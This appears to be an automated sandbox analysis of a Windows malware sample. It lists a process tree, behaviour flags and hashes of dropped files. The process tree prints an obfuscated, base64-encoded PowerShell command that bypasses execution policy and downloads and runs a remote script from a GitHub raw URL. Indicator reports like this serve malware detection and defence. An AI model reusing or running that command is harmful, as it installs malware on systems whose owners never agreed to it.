  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\72DA.exe
  MD5: 63151e4f7c3972f18a23c0e9996e14ef
  SHA1: 5d041fde6433a8ff8fc78a69fca1fd4630e3f270
  SHA256: cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
  SHA512: f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RES8BA2.tmp
MD5 1e950a636adb13a1d1092ca915beec5e
SHA1 28986057998c038dbcd153876e2de5a1bfbe6145
SHA256 55417c09b31e2314aa5939118235269a5197d8808c92cc675b71fe1be2a124eb
SHA512 40b3d57268a2a183854e22896985b699b9653328ab4ac165ab687f8465afc1419bb2291fd441d21c3802c89202a86a4ac41794de0c465b0a508efd70d75bf2e6
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
MD5 f783019c5dc4a5477d1ffd4f9f512979
SHA1 37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA256 4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA512 64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\lddmhxjh\lddmhxjh.dll
MD5 c5d25f19d82d332ab803560d68b3437a
SHA1 32522eca8084c9d0029fbba2aa074c0706122261
SHA256 cbc94c45f14a62da7094c5dc59c4bb32a8b7d6da128f1bbc700a294fcd179259
SHA512 9507682818f21aaed1a9ad27fd44f7fced2c31291ac9189f390ea457af04e259d6a105ad3066e9974628b58583c090c88e3c230ea12181369ae6bdee85eff41e
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\lddmhxjh\CSC9E2A9D0A82214121ABF59FA852F7FDB4.TMP
MD5 7a98ed942429b217ad65678f3410197c
SHA1 ac9f7257c96992dcd241d95042b13e720e226c95
SHA256 30d06168ae3b5d22880647b3c3242434a6f05b8b50bec75088988eab897922d0
SHA512 5ac3d644c1d995695f4a64e8f56a782fb2bc23510a3f03093d94d642c1d1c640a752ca9e7e328694da8cdd2c813b7bc0f5d8b734698564d1ee24e84b68eb1014
-
\??\c:\Users\Admin\AppData\Local\Temp\lddmhxjh\lddmhxjh.0.cs
MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\lddmhxjh\lddmhxjh.cmdline
MD5 6b57a26851e5ebd359bcfa6324ab9575
SHA1 e356770c02c3d61448423d7184a1bee2eed9ff0b
SHA256 027a36038f9eec8f4bef3549f34ee87881bd11ce45afaa094303635db0993388
SHA512 6dce84019d88269925eb051654afc01e51f7966413c62f5a12434b0467a83c06c7c56c1e3a9f86e4e49bacc6c75d91997a4bcb6f7dd99f93e6a2441e603187a2
-
\Windows\Branding\mediasrv.png
MD5 ac13d804585a74dc542db4ec94da39df
SHA1 8642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA256 84c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA512 0ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.png
MD5 9151c95451abb048a44f98d0afac8264
SHA1 22f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA256 8082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512 728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13